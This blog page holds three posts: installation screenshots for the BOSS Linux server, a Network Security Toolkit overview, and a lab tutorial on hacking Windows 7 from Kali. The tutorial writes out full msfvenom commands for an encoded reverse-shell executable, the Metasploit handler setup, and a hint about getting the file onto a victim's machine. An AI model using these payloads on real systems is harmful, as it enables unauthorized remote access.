Social Icons

Wednesday, August 24, 2016

BOSS Advanced server : Installation screenshots

1.   Bharat Operating System Solutions (BOSS) is a free and open source Linux distribution developed by the National Resource Centre for Free/Open Source Software (NRCFOSS) of India. BOSS GNU/Linux is also known by the acronym BOSS. The latest version is 6.0

2.    BOSS Advanced server supports Intel and AMD x86-64 architecture. It is bundled with web server, proxy server, database server, mail server, network server, file server, SMS server and LDAP server. It also contains various administrative tools as webmin, Gadmin, PHP myadmin, PHP LDAP admin and PG admin.This post gives a step wise screen shot sequence as it happens in a virtual box environment while installing the server edition of BOSS
































Tuesday, July 12, 2016

Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7
 Windows 7 Ultimate Machine : IP Address : 192.168.1.8
 Pinging from Kali LInux Machine to Windows 7 Machine
 Pinging from Windows 7 to Kali Linux Machine
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe
Click to Enlarge
Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 
Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :
The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :
Here you have the C:\ prompt from the windows machine :-)

Thursday, July 07, 2016

Network Security Toolkit (NST)

The Network Security Toolkit is the brainchild of Paul Blankenbaker and Ron Henderson and is a Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional. The Network Security Toolkit (NST) is a Linux-based Live DVD/USB Flash Drive that provides a set of open source computer security and networking tools to perform routine security and networking diagnostic and monitoring tasks. The distribution can be used as a network security analysis, validation and monitoring tool on servers hosting virtual machines. The majority of tools published in the article "Top 125 security tools" by Insecure.org are available in the toolkit. NST has package management capabilities similar to Fedora and maintains its own repository of additional packages.he new version of NST was released June 5 and according to the NST Web site, this release includes:
 
  • A Enterprise class patch management system for NST WUI updates and system file patches and updates.
     
  • A new nstvmware script to facilitate the use of NST within a VMware virtual machine.
     
  • The inclusion of the VMware Tools and modules to optimize the NST performance within a VMware virtual machine.
     
  • Many new enhancements to the NST WUI database management pages for both the MySQL and PostgreSQL database servers.
     
  • Replaced the NST WUI network protocol anaylzer capture engine: “tethereal” with the new light-weight “dumpcap” application which is part of the new “ethereal” v0.99.0 protocol analyzer suite.
     
  • Many networking and security applications have been updated to their latest version.
Download Link :  https://sourceforge.net/projects/nst/files/latest/download?source=files

Size : 2.8 GB

The screen shots below show a run through while I installed the NST on a virtual box.










AS it completes the installation part below :
While you run the installed image for the first time,the interface will ask to create a basic user as below : 



Ready to go.....

Powered By Blogger